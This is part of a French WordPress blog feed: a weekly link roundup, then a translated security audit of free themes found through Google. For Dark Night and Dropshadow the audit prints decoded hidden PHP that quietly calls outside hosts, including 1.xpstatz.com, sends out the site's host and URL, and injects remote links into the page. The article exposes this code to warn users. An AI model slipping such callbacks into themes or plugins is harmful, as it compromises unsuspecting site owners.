<p><em><strong>Mise à jour du 5 avril :</strong> <a href="http://wordpress.org/news/2011/04/wordpress-3-1-1/">WordPress 3.1.1 est disponible en version originale</a> depuis 17 H 10 environ&#8230; et <a href="http://fr.wordpress.org/releases/#older">en français dès maintenant</a>.<br />
</em></p>
<h3>Courir pour WordPress</h3>
<p><a href="http://en.blog.wordpress.com/2011/03/29/automattic%E2%80%99s-worldwide-wp-5k/">Automattic lance le &laquo;&nbsp;Worlwide WP 5k&nbsp;&raquo;</a>. Il s&#8217;agit de courir 5 km de la manière que l&#8217;on souhaite (en marchant, en courant,  en vélo, en nageant&#8230;) et de se filmer/photographier&#8230; puis bien sur  de la bloguer. Le but de l&#8217;opération est de rendre compte de la manière  dont on l&#8217;a fait, où on l&#8217;a fait, etc. La date est fixée au 10 avril, mais il est possible de se lancer entre le 4 et le 10 avril. Pour vos publications qui suivront, utilisez le tag <em>wwwp5k</em>. Au départ, ce sont les &laquo;&nbsp;automatticiens&nbsp;&raquo; qui ont décidé cette initiative pour eux-mêmes et ils ont décidé d&#8217;ouvrir cette épreuve à tous les passionnés de WordPress.</p>
<h3>Personnaliser et transformer un thème pour un site complexe</h3>
<p>Lumière de Lune nous explique comment elle s&#8217;y est prise <a href="http://www.lumieredelune.com/encrelune/site-wordpress-complexe,2011,03">pour reprendre un thème entièrement de façon à l&#8217;adapter pour un site complexe.</a> Intéressant de voir sa démarche.</p>
<h3>14 astuces pour sécuriser un site WordPress</h3>
<p>Aurélien liste <a href="http://wpchannel.com/14-astuces-securiser-site-wordpress/">14 astuces permettant de sécuriser</a> son site sous WordPress.</p>
<h3>Améliorer l&#8217;administration sous Android</h3>
<p>Logiclord n&#8217;est pas satisfait entièrement de l&#8217;application WordPress pour Android. Il la trouve trop limitée. <a href="http://logiclord.com/wp-admin-for-android-app">Qu&#8217;à cela ne tienne, il rajoute ce qu&#8217;il attend.</a></p>
<h3>Importation de Blogger vers WordPress</h3>
<p>Vous avez commencer par bloguer sur la plateforme Blogger et aujourd&#8217;hui vous souhaiter migrer vers une installation WordPress. Comment faire la bascule sans dommage ? <a href="http://www.luc-bernouin.com/blog/importer-les-articles-de-son-blog-blogger-dans-wordpress">Il suffit de suivre ce lien.</a></p>
<h3>Les 10 meilleurs hacks de tous les temps</h3>
<p>C&#8217;est ce qu&#8217;annonce onextrapixel.com. <a href="http://www.onextrapixel.com/2011/03/31/top-10-wordpress-hacks-of-all-time/">Il donne son avis sur les hacks</a> les plus connus et les détaille.</p>
<h3>Désactiver le renouvellement du mot de passe</h3>
<p>Daniel Roch nous propose de <a href="http://www.seomix.fr/wordpress/hack/mot-de-passe/">désactiver la fonction de renouvellement du mot de passe</a> dans WordPress et ce, pour raison de sécurité notamment.</p>
<h3>Rendre un thème plus attirant</h3>
<p><a href="http://wpmu.org/5-simple-ways-to-improve-a-boring-wordpress-theme/">WPMU.org donne 5 points</a> qui permettent de rendre un site plus attractifs, notamment par l&#8217;utilisation des images et de la mise en page&#8230;</p>
<h3>Comparaison des performances entre joomla!, WordPress et un site classique</h3>
<p><a href="http://eticweb.com/dossier-thematique/web/benchmark-eco-conception-web-entre-joomla-wordpress-et-site-statique/">Eticweb a comparé les performances de WordPress, de Joomla! et d&#8217;un site classique en HTML</a>. Le résultat est intéressant&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2011/04/05/lhebdo-wordpress-11/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche</title>
		<link>http://www.wordpress-fr.net/2011/01/26/il-ne-faut-jamais-chercher-un-theme-wordpress-gratuit-sur-un-moteur-de-recherche/</link>
		<comments>http://www.wordpress-fr.net/2011/01/26/il-ne-faut-jamais-chercher-un-theme-wordpress-gratuit-sur-un-moteur-de-recherche/#comments</comments>
		<pubDate>Wed, 26 Jan 2011 14:20:31 +0000</pubDate>
		<dc:creator>Xavier</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=2073</guid>
		<description><![CDATA[[ceci est la traduction de l'article "Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else", écrit par Siobhan Ambrose sur WPMU.org. Cet article nous a semblé suffisamment pertinent pour justifier une VF, ce que l'auteur nous a autorisé à faire] Il y a quelques mois, j&#8217;avais écrit une liste de [...]]]></description>
			<content:encoded><![CDATA[<p>[ceci est la traduction de l'article "<a href="http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/">Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else</a>", écrit par Siobhan Ambrose sur <a href="http://wpmu.org">WPMU.org</a>. Cet article nous a semblé suffisamment pertinent pour justifier une VF, ce que l'auteur nous a autorisé à faire]</p>
<p>Il y a quelques mois, j&#8217;avais écrit une liste de conseils pour sécuriser son installation WordPress  (&laquo;&nbsp;<a href="http://wpmu.org/wordpress-security-101-8-tips-tricks-and-tweaks-to-secure-your-wordpress-website/">WordPress Security</a>&laquo;&nbsp;). Pour le présent article, je me suis armée des mots &laquo;&nbsp;free WordPress themes&nbsp;&raquo;, et des extensions <a href="http://wordpress.org/extend/plugins/tac/">Theme Authenticity Checker</a> (TAC) de <a href="http://builtbackwards.com/">builtBackwards</a> et <a href="http://wordpress.org/extend/plugins/exploit-scanner/">Exploit Scanner</a> de <a href="http://ocaoimh.ie/about/">Donncha O Caoimh</a>, afin de me plonger dans la première page de résultats Google pour une recherche sur des thèmes WordPress gratuits, et voir à quel point ils peuvent être sécurisés &#8212; ou non.</p>
<div id="attachment_2074" class="wp-caption aligncenter" style="width: 510px"><img class="size-large wp-image-2074" title="google_search" src="http://www.wordpress-fr.net/files/2011/01/google_search-500x62.png" alt="" width="500" height="62" /><p class="wp-caption-text">A la recherche de thèmes !</p></div>
<p>Notez bien que je n&#8217;ai installé aucun des thèmes présentés ci-après sur mon serveur. Au lieu de cela, j&#8217;ai installé WordPress en local avec XAMPP. Je déconseille de mettre en ligne les thèmes provenant de sites inconnus : vous ne savez jamais le mal qu&#8217;ils pourraient faire !</p>
<p><img class="aligncenter size-full wp-image-2075" title="google1" src="http://www.wordpress-fr.net/files/2011/01/google1.png" alt="" width="494" height="533" /></p>
<h3>1. WordPressThemesBase</h3>
<p>WordPress Themes Base a la chance d&#8217;être en première position pour la recherche &laquo;&nbsp;Free WordPress Themes&nbsp;&raquo;. En voilà un qui a bien travaillé son optimisation pour les moteurs de recherche ! Le descriptif nous indique que le visiteurs n&#8217;y trouvera que des thèmes récents. Super ! J&#8217;adore les thèmes récents.</p>
<p>J&#8217;ai donc téléchargé le thème Prinz Brandford Magazine. Dès le départ, un problème se présente. Branford Magazine est un thème conçu par Der Prinz ; on en trouve une très vieille version qui n&#8217;est pas conçue pour WordPress 3.0 (autant que je puisse en juger), et une version Pro qui est sortie il y a peu. Cela signifie que vous avez le choix entre un thème qui ne marchera pas avec la dernière version de WP, ou un thème est soit-disant &laquo;&nbsp;professionnel&nbsp;&raquo;.</p>
<p>Installons le thème et testons-le avec l&#8217;extension TAC.</p>
<p><img class="aligncenter size-large wp-image-2076" title="BranfordMagTac" src="http://www.wordpress-fr.net/files/2011/01/BranfordMagTac-500x225.png" alt="" width="500" height="225" /></p>
<p>Du code chiffré ! On n&#8217;en est qu&#8217;au premier site sur Google, et déjà on essaye de nous avoir avec un chiffrement en Base64 ! <img src='http://www.wordpress-fr.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  Ca commence mal&#8230; Le codage base64 est souvent utilisé pour cacher du code malicieux. On peut voir que le code se trouve dans le pied de page, voyons voir ça de plus près :</p>
<p><img class="aligncenter size-full wp-image-2077" title="BranfordMagfoot" src="http://www.wordpress-fr.net/files/2011/01/BranfordMagfoot.png" alt="" width="463" height="80" /></p>
<p>Et ouais, mon copyright, comme il se doit ! Mais à quoi correspond ce codage base64 ? Voici le code lui-même :</p>
<p><img class="aligncenter size-large wp-image-2078" title="Branfordbase64" src="http://www.wordpress-fr.net/files/2011/01/Branfordbase64-500x104.png" alt="" width="500" height="104" />Beaucoup de blabla.</p>
<p>Le codage base64 peut se décoder de deux manières :</p>
<ul>
<li>Utiliser le <a href="http://ottodestruct.com/decoder.php">décodeur d&#8217;Otto</a>, très pratique !</li>
<li>Le décoder à la main, ou presque. Cela suppose de changer la fonctionn eval() pour un echo(), pour forcer l&#8217;affichage de ce qui est caché. <a href="http://wordpress.shadowlantern.com/2009/08/decrypting-footers-base64/">Cet article en anglais vous explique la procédure</a>.</li>
</ul>
<p>J&#8217;ai choisir la seconde option. Le résultat de l&#8217;échange de fonctions :</p>
<p><img class="aligncenter size-full wp-image-2079" title="BranfordMagazinefooter" src="http://www.wordpress-fr.net/files/2011/01/BranfordMagazinefooter.png" alt="" width="453" height="75" /></p>
<p>Hein ?! Il y a une seconde c&#8217;était mon copyright !!! Mais ! Maintenant ça parle de télécharger un anti-virus. D&#8217;où cela vient-il ? Certainement de ce code en base64.</p>
<p><strong>Le verdict<br />
</strong></p>
<p>J&#8217;ai téléchargé deux autres thèmes de ce site, et ils contenaient également du code base64. Le base64 ne dissimule pas forcément que des liens. Il peut aussi cacher du code malicieux qui mettra la pagaille dans votre site. En plus de cela, ce site, qui promet des thèmes récents, propose en définitive des thèmes créés par d&#8217;autres personnes, auquel le propriétaire du site ajoute son code base64. J&#8217;ai contacté Michael Oeser de Der Prinz, et il m&#8217;a dit avoir tenté de contacter le webmaster afin d&#8217;enlever son thème, sans succès. Il a donc publié <a href="http://www.der-prinz.com/beware-pirated-wordpress-themes-1249">un avertissement sur site</a>, sur le danger de télécharger des thèmes piratés. En tant que créateur du thème Branford Magazine, son conseil est d&#8217;éviter les sites comme celui-ci &#8212; assurément un bon conseil !</p>
<p><strong>Ma suggestion<br />
</strong></p>
<p>A éviter !</p>
<p><span id="more-2073"></span></p>
<h3>2. Free WordPress Themes</h3>
<p>Un autre site avec des thèmes WordPress gratuits. Super ! Exactement ce que je cherche : j&#8217;adore tout ce qui est gratuit. Le premier thème de ce site se nomme BeautyStore. J&#8217;adore les boutiques de cosmétiques, donc je vais télécharger celui-ci, l&#8217;installer&#8230; et le tester avec TAC.</p>
<p><img class="aligncenter size-large wp-image-2081" title="beautystoretac" src="http://www.wordpress-fr.net/files/2011/01/beautystoretac-500x198.png" alt="" width="500" height="198" /></p>
<p>Du code crypté !</p>
<p>Le voici dans le pied de page :</p>
<p><img class="aligncenter size-large wp-image-2082" title="BeautySTorefooter" src="http://www.wordpress-fr.net/files/2011/01/BeautySTorefooter-500x217.png" alt="" width="500" height="217" /></p>
<p>Pour une magasin de cosmétiques, ce n&#8217;est pas très joli. On y trouve toutes sorties de fonctions chiffrées. J&#8217;ai transformé les eval() et echo(), sans succès. J&#8217;ai utilisé quelques décodeurs, mais cela reste illisible <img src='http://www.wordpress-fr.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>Les testeurs de failles ne l&#8217;aiment pas plus que moi :</p>
<p><img class="aligncenter size-large wp-image-2083" title="beautystoreexploit" src="http://www.wordpress-fr.net/files/2011/01/beautystoreexploit-500x329.png" alt="" width="500" height="329" /></p>
<p>Toutes ces failles sont indiquées comme étant graves (&laquo;&nbsp;severe warning&nbsp;&raquo;)</p>
<p><strong>Le verdict</strong></p>
<p>On en est au deuxième site sur Google, et déjà on a du chiffrement en base64. J&#8217;ai téléchargé quelques autres thèmes qui contenaient des liens statiques et pas de base64. Je suppose que ce site est au petit bonheur la chance&#8230; Cependant, avec le site précédent j&#8217;avais pu déchiffrer le code, et là, non. Une recherche sur certains forums avec des extraits du code du pied de page indique que le code chiffré pourrait être du hacking <img src='http://www.wordpress-fr.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  Je ne suis pas assez technique pour le reconnaître, et je suppose que la plupart des utilisateurs de WordPress ne le sont pas plus. De fait&#8230;</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>3. Themes2WP</h3>
<p>En survolant les thèmes de Themes2WP, on en trouve quelques-uns très tentants. Jetons un oeil à Gameliso, qui nous semble très joli.</p>
<p><img class="aligncenter size-large wp-image-2086" title="GameLisoTAC" src="http://www.wordpress-fr.net/files/2011/01/GameLisoTAC-500x131.png" alt="" width="500" height="131" />TAC nous dit qu&#8217;il y trouve 5 liens statiques. En soit ce n&#8217;est pas grave : un développeur a le droit de faire un lien vers son site. Voici les liens en question :</p>
<p><img class="aligncenter size-large wp-image-2087" title="gamelisostaticlinks" src="http://www.wordpress-fr.net/files/2011/01/gamelisostaticlinks-500x164.png" alt="" width="500" height="164" /></p>
<p>Hmmmmm… Je ne sais pas pour vous, mais je ne vois pas trop ce que des sites pour célibataires ou pour des gardiens d&#8217;animaux ont à voir avec le développement de thèmes. Jetons un cil au code de footer.php :</p>
<p><img class="aligncenter size-large wp-image-2088" title="Gamelisocode" src="http://www.wordpress-fr.net/files/2011/01/Gamelisocode-500x192.png" alt="" width="500" height="192" /></p>
<p>Voici les liens, avec un message fort utile : &laquo;&nbsp;Ne modifiez pas le code suivant, sans quoi votre site ne marchera plus !&nbsp;&raquo; C&#8217;est gentil de le dire ! J&#8217;ai failli enlever ces liens et casser mon site ! Ouf !</p>
<p>Sauf que&#8230; J&#8217;ai effectivement enlevé ces liens, et le site marche tout aussi bien.</p>
<p>Un autre lien se trouve dans sidebar.php :</p>
<p><img class="aligncenter size-large wp-image-2089" title="gamelisosidebarlink" src="http://www.wordpress-fr.net/files/2011/01/gamelisosidebarlink-500x26.png" alt="" width="500" height="26" />Maintenant voyons les styles qui s&#8217;appliquent à la classe .ad_lnk :<img class="aligncenter size-full wp-image-2090" title="gamelisocss" src="http://www.wordpress-fr.net/files/2011/01/gamelisocss.png" alt="" width="348" height="119" /></p>
<p>Ouahou ! Voilà un lien qui sort de sentiers battus ! Il ne sert pas à grand-chose, hormis faire un lien caché.</p>
<p>Nous avons regardé les liens, voyons voir ce que donne le testeur de failles.</p>
<p><img class="aligncenter size-large wp-image-2091" title="GameLisoExploitScanner" src="http://www.wordpress-fr.net/files/2011/01/GameLisoExploitScanner-500x77.png" alt="" width="500" height="77" /></p>
<p>Le thème contient un eval() qui pourrait lancer du code malicieux. Ce n&#8217;est pas le genre de chose que l&#8217;on souhaite avoir dans son thème.</p>
<p>[NdT : il s'agit ici de la <a href="http://api.jquery.com/jQuery.globalEval/">méthode globalEval() de jQuery()</a>, qui est un eval() s'appliquant au contexte global. Le fonction en elle-même n'est pas forcément malicieuse, car des applications peuvent y faire appel de manière totalement inofensive]</p>
<p><strong>Le verdict </strong></p>
<p>De jolis thèmes, mais avec 5 liens vers des gens que vous ne souhaitez sans doute pas remercier.  Il va jusqu&#8217;à vous dire de ne retirer ces liens, ce que fera un débutant ne connaissant pas bien WordPress. Quant aux fonctions eval(), elles sont peut-être sans danger, mais je ne m&#8217;y connais pas assez en JavaScript pour vous dire si c&#8217;est le cas ou non.</p>
<p><strong>Ma suggestion </strong></p>
<p>A éviter !</p>
<h3>4. FreeWPThemes</h3>
<p>Maintenant que je suis convaincue que tous les sites en dehors de WordPress.org sont à éviter, j&#8217;ai été surprise de ne pas trouver de liens rajoutés dans aucun des thèmes que j&#8217;ai téléchargé sur FreeWPThemes. J&#8217;en ai téléchargé 5, ils avaient tous les mêmes liens :</p>
<p><img class="aligncenter size-large wp-image-2097" title="programmetac" src="http://www.wordpress-fr.net/files/2011/01/programmetac-500x185.png" alt="" width="500" height="185" /></p>
<p>Aucun de ces liens ne semble hors de propos. Je me suis donc sentie coupable de mes suppositions erronées.</p>
<p>Cependant, j&#8217;ai testé ces thèmes avec l&#8217;extension Theme Check. Celle-ci analyse votre thème pour s&#8217;assurer qu&#8217;il correspond aux bonnes pratiques. Voici son avis :</p>
<p><img class="aligncenter size-large wp-image-2098" title="Programmethemecheck" src="http://www.wordpress-fr.net/files/2011/01/Programmethemecheck-500x387.png" alt="" width="500" height="387" />Plein d&#8217;erreurs ! Il y en a même plus que ça : je ne pouvais pas les mettre toutes dans une seule capture d&#8217;écran !</p>
<p><strong>Le verdict</strong></p>
<p>Bien que les thèmes de FreeWPThemes ne correspondent pas vraiment aux standards de qualité mis en place par le dépôt de thèmes de WordPress.org, il ne semble là rien y avoir de malicieux, même pas un lien caché. Il se peut que certains aspects d&#8217;un thème ne fonctionne pas comme attendu, mais rien de bien méchant !</p>
<p><strong>Ma suggestion</strong></p>
<p>Ca va, mais vérifiez bien que toutes les fonctionnalités qui vous sont nécessaire fonctionnent effectivement.</p>
<h3>5. WordPress.org</h3>
<p><strong>Enfin ! WordPress.org ! </strong>Nous connaissons tous ce site. C&#8217;est le plus sûr pour trouver des thèmes. Je pense que le problème que l&#8217;on peut avoir le dépôt de thème est que nombre d&#8217;entre eux semble avoir été conçus au XVIIe sicèle (ou pas loin). Cela peut être frustrant, surtout parce que un grand ne fonctionne pas très bien avec WordPress 3.0. Au bas du présent article, je vous donnerai quelques liens vers d&#8217;autres bons sites où trouver de superbes thèmes.</p>
<p><img class="aligncenter size-large wp-image-2099" title="wordpress.org_" src="http://www.wordpress-fr.net/files/2011/01/wordpress.org_-500x79.png" alt="" width="500" height="79" /></p>
<p><strong>Le verdict</strong></p>
<p>Un site de confiance pour trouver des thèmes WordPress gratuits.</p>
<p><strong>My suggestion</strong></p>
<p>&lt;3</p>
<h3>6. Themes.Rock Kitty</h3>
<p>Ce site présente une image d&#8217;un chat jouant une guitare. Tant qu&#8217;il y a un chat quelque part, je deviens très conciliante. Le premier thème que j&#8217;ai téléchargé n&#8217;a pas de liens publicitaire ou de code caché. Idem pour le deuxième. Mais le troisième m&#8217;a donné ceci :</p>
<p><img class="aligncenter size-large wp-image-2100" title="Funda1" src="http://www.wordpress-fr.net/files/2011/01/Funda1-500x300.png" alt="" width="500" height="300" /></p>
<p>Encore du base64 !</p>
<p>Cette fois-ci, changer les eval() pour un echo() m&#8217;a donné ceci :</p>
<p><img class="aligncenter size-large wp-image-2101" title="fundomessage" src="http://www.wordpress-fr.net/files/2011/01/fundomessage-500x34.png" alt="" width="500" height="34" /></p>
<p>Le lien du bas de page ressemblaient à ça :</p>
<p><img class="aligncenter size-large wp-image-2102" title="fundolinks" src="http://www.wordpress-fr.net/files/2011/01/fundolinks-500x18.png" alt="" width="500" height="18" /></p>
<p>Le scanner de failles m&#8217;a renvoyé<strong> 17 alertes graves</strong> pour ce thème. Etant donné que seuls 4 liens sont visibles en bas de page, je suppose que ce thème est rempli de liens cachés, ou qu&#8217;un truc pas clair se déroule dans son code.</p>
<p><strong>Le verdict</strong></p>
<p>A utiliser avec précaution. Si vous comptez leur télécharger des thèmes, installez-le d&#8217;abord en local, et vérifiez-les. Voici un n-ième site où vous pourriez vous retrouver à télécharger un thème qui vous détournera votre site. Soyez prudents !</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>7. WP Themes Depot</h3>
<p>Un autre site qui nous propose les thèmes WordPress les plus récents, les plus à jour, les plus beaux, les plus gratuits. Cette fois, j&#8217;ai téléchargé le thème le plus populaire du site, Nifertiti, téléchargé 980 fois. Comme d&#8217;habitude, je l&#8217;ai donné en pâture à TAC, qui m&#8217;a indiqué le code chiffré suivant :</p>
<p><img class="aligncenter size-large wp-image-2133" title="Niferiti" src="http://www.wordpress-fr.net/files/2011/01/Niferiti-500x325.png" alt="" width="500" height="325" />En changeant les eval() en echo(), on obtient :</p>
<p><img class="aligncenter size-large wp-image-2134" title="fundomessage" src="http://www.wordpress-fr.net/files/2011/01/fundomessage1-500x34.png" alt="" width="500" height="34" />Ils ne veulent pas apparemment pas que je me débarrasse de leur code. Ces liens apparaissent dans le pied de page :</p>
<p><img class="aligncenter size-large wp-image-2135" title="nefiritilinks" src="http://www.wordpress-fr.net/files/2011/01/nefiritilinks-500x16.png" alt="" width="500" height="16" /></p>
<p><strong>Le verdict</strong></p>
<p>Encore un site avec du base64 dans son code. Je pense qu&#8217;il n&#8217;est pas nécessaire de répéter qu&#8217;on ne peut pas avoir confiance en ce type de code. Un développeur peut très bien ajouter des liens à son thème, mais les dissimuler avec du base64, c&#8217;est tout autre chose. Surtout quand on sait qu&#8217;un tel chiffrement peut cacher du code malicieux.</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>8. WPRex</h3>
<p>Je téléchargé 5 thèmes chez WPRex, les deux premiers contenaient des liens vers du spam, et les trois autres contenaient (surprise surprise) du base64.</p>
<p><img class="aligncenter size-large wp-image-2136" title="pinkdesiretac" src="http://www.wordpress-fr.net/files/2011/01/pinkdesiretac-500x156.png" alt="" width="500" height="156" />Il s&#8217;agit de Pink Desire. Déchiffrons-le avec le <a href="http://www.tareeinternet.com/scripts/decrypt.php">décodeur</a> :</p>
<p><img class="aligncenter size-large wp-image-2137" title="pinkdesiredecoded" src="http://www.wordpress-fr.net/files/2011/01/pinkdesiredecoded-500x299.png" alt="" width="500" height="299" />Des liens cachés.</p>
<p><strong>Le verdict</strong></p>
<p>Encore un site moyen. Si vous devez télécharger un de leurs thèmes, vérifiez bien ce qu&#8217;il affiche avec le TAC, et le décodeur pour tout ce qui est caché en base64.</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>9. No Limits Web Design</h3>
<p>J&#8217;avais de bons espoirs pour ce site, à cause de son nom différent des autres, mais non, même annonce : de super thèmes WordPress gratuits. J&#8217;ai téléchargé l&#8217;un des thèmes mis en avant, Dark Night, et une fois de plus, du code base64.</p>
<p><img class="aligncenter size-large wp-image-2138" title="Darknight" src="http://www.wordpress-fr.net/files/2011/01/Darknight-500x132.png" alt="" width="500" height="132" /></p>
<p>En plus du base64, j&#8217;ai trouvé un eval(str_rot13()). Vous pouvez le décoder <a href="http://rot13-encoder-decoder.waraxe.us/">avec cet outil</a>. J&#8217;ai obtenu ce résultat :<img class="aligncenter size-large wp-image-2139" title="darknightstr" src="http://www.wordpress-fr.net/files/2011/01/darknightstr-500x88.png" alt="" width="500" height="88" /></p>
<p>C&#8217;est en gros la licence. Cependant, en transformant le eval() du haut de la page en echo(), on obtient ceci :</p>
<pre>function wp_code() {
		$default_link_text = "Default";
		$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
		$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
		$l = "";
		foreach($link_host as $value) {
			if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
				while (!feof ($file)) {
					$line = fgets ($file);
					$l .= $line;
				}
				fclose($file);
				break;
			} else {
				if ($value == end($link_host)) {
					$l=$default_link_text;
				}
			}
		}
		return $l;
	}
	function check_wp_code_sidebar() {
		$uri = strtolower($_SERVER["REQUEST_URI"]);
		if(is_admin() || substr_count($uri, "wp-admin") &gt; 0 || substr_count($uri, "wp-login") &gt; 0 ) {
		} else {
			$l="";
			$f = dirname(__file__) . "/sidebar.php";
			$fd = fopen($f, "r");
			$c = fread($fd, filesize($f));
			fclose($fd);
			if (strpos($c, $l) == 0) { die; }
		}
	}
	check_wp_code_sidebar();</pre>
<p>Ce thème rajoute des links dans la barre latérale. Pauvre site !</p>
<p>Voici ce qu&#8217;indique le testeur de failles :</p>
<p><img class="aligncenter size-large wp-image-2140" title="Darknightexploitscan" src="http://www.wordpress-fr.net/files/2011/01/Darknightexploitscan-500x209.png" alt="" width="500" height="209" /></p>
<p><strong>Le verdict</strong></p>
<p>Encore un site avec du base64, donc a éviter. Celui-ci a des liens encore plus cachés que les autres.</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>10. Templates Browser</h3>
<p>On en a presque terminé ! En fait, j&#8217;ai fait une petite recherche sur Templates Browser, et trouvé <a href="http://www.onnoot.com/wiki/templatesbrowser.com_distributes_malware">cet article</a>. Vous pouvez donc vous douter de ce qu&#8217;il va arriver. J&#8217;ai téléchargé le thème Dropshadow, qui en réalité a été créé par <a href="http://www.briangardner.com/">Brian Gardner</a>, mais que vous ne pouvez plus obtenir depuis son site (sans doute parce qu&#8217;il est assez vieux, et pas compatible avec WP 3.0).</p>
<p>TAC a trouvé ces liens :</p>
<p><img class="aligncenter size-large wp-image-2141" title="dropshadowtac" src="http://www.wordpress-fr.net/files/2011/01/dropshadowtac-500x353.png" alt="" width="500" height="353" /></p>
<p>Voilà un bien gros morceau de PHP. Celui-ci se rapporte à un site de casino en ligne. Cependant, on y trouve du code encore plus suspicieux. Le voici au propre :</p>
<pre>get_col("SELECT option_value FROM $wpdb-&gt;options WHERE option_name='l_time_code'");
$l_code = $wpdb-&gt;get_col("SELECT option_value FROM $wpdb-&gt;options WHERE option_name='l_code'");

if (empty($l_time_code)) {
 $wpdb-&gt;query("INSERT INTO $wpdb-&gt;options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
 $new_time_code = 0;
} else
 $new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
 $wpdb-&gt;query("INSERT INTO $wpdb-&gt;options (option_name, option_value, autoload) VALUES ('l_code', '', 'no')");
 $new_l_code = '';
} else $new_l_code = $l_code[0];

if ( ( time() - $new_time_code ) &gt;= 60 ) {
 $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
 $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
 $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
 $xps = "xps.";
 $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
 $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&amp;u=" . urlencode($_SERVER['REQUEST_URI']);

 //1.xpstatz.com/xps.php?h=host&amp;u=uri
 if (ini_get('allow_url_fopen')) {
 $new_l_code = @file_get_contents("http://" . $url . $page);
 } else {
 $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
 if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
 @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
 $new_l_code = "";
 while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
 $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
 }
 $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
 }
 @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
 }
 if ( strpos($new_l_code, '[/]') ) {
 $new_time_code = time();
 $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
 $wpdb-&gt;query("UPDATE $wpdb-&gt;options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb-&gt;query("UPDATE $wpdb-&gt;options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
 }
}

if ( strpos($new_l_code, '[/]') ) {
 $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
 $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
 echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
 $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?&gt;</pre>
<p>Il stocke des liens dans la base de données, et toutes les 60 secondes va récupérer un code provenant d&#8217;un site tiers. Il met ensuite à jour l&#8217;horodatage de ces liens, et les affiche dans le pied de page.</p>
<p>En bref, une manière bien complexe de faire ce qui a déjà été décrit pour les autres thèmes frauduleux.</p>
<p><strong>Le verdict</strong></p>
<p>C&#8217;était déjà mal partis quand un autre site nous indique que Templates Browser contient du malware. Ca s&#8217;est aggravé quand on a constaté qu&#8217;ils ont piqué le thème d&#8217;un designer respecté. Le gros morceau de code n&#8217;est que la goutte qui fait déborder le vase.</p>
<p><strong>Ma suggestion</strong></p>
<p>A éviter !</p>
<h3>Conclusion</h3>
<p>Voici les stats pour les 10 premiers sites de la première page Google :</p>
<ul>
<li>Sûr : 1</li>
<li>Mouais : 1</li>
<li>A éviter : 8</li>
</ul>
<p>8 des 10 sites utilisent du base64 dans leur thème. L&#8217;utilisateur WordPress moyen sait peut-être qu&#8217;il ne faut pas télécharger n&#8217;importe quel thème, mais le stats de ces sites indiquent des milliers de téléchargements. Un nouveau venu aura de grande chance de taper &laquo;&nbsp;free WordPress themes&nbsp;&raquo; dans Google et tomber sur un site qui leur donne ce qu&#8217;il cherche, mais avec des liens en trop et du code malicieux.</p>
<p>Bien entendu, le dépôt de thèmes officiels de WordPress.org peut être frustrant, car tous ses thèmes ne sont pas forcément compatibles avec WP 3.0, et beaucoup sont un peu datés/dépassés, voire présentent des bugs avec les dernières versions de WP. Voic donc quelques sites sûr où trouver des thèmes WordPress gratuits&#8230;</p>
<h3>Bons sites de thèmes WordPress gratuits</h3>
<ul>
<li><a href="http://themeshaper.com/" target="_blank">Theme Shaper</a></li>
<li><a href="http://www.themelab.com/free-wordpress-themes/" target="_blank">ThemeLab</a></li>
<li><a href="http://themehybrid.com/" target="_blank">Theme Hybrid</a></li>
<li><a href="http://www.arrastheme.com/" target="_blank">Arras Theme</a></li>
